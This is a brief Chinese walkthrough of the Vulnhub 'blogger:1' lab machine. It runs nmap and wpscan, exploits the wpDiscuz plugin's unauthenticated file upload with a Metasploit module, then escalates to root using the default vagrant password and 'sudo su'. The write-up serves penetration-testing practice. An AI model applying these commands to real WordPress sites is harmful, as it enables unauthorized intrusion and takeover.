Vulnhub: blogger:1靶机

kali:192.168.111.111

靶机:192.168.111.176

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.176

Vulnhub: blogger:1靶机_第1张图片

在80端口的/assets/fonts/目录下发现blog目录,访问后发现为wordpress

Vulnhub: blogger:1靶机_第2张图片

利用wpscan发现wordpress插件wpdiscuz存在任意文件上传漏洞

wpscan --url http://blogger.thm/assets/fonts/blog/ -e u,ap --plugins-detection mixed

Vulnhub: blogger:1靶机_第3张图片

漏洞利用

msf进行漏洞利用

use exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload
set targeturi /assets/fonts/blog/
set blogpath /?p=1
set rhosts blogger.thm
run

Vulnhub: blogger:1靶机_第4张图片

提权

vagrant用户的密码同样为vagrant

Vulnhub: blogger:1靶机_第5张图片

vagrant用户sudo权限

Vulnhub: blogger:1靶机_第6张图片

提升为root

sudo su

Vulnhub: blogger:1靶机_第7张图片

flag

Vulnhub: blogger:1靶机_第8张图片

你可能感兴趣的:(安全,web安全,网络安全)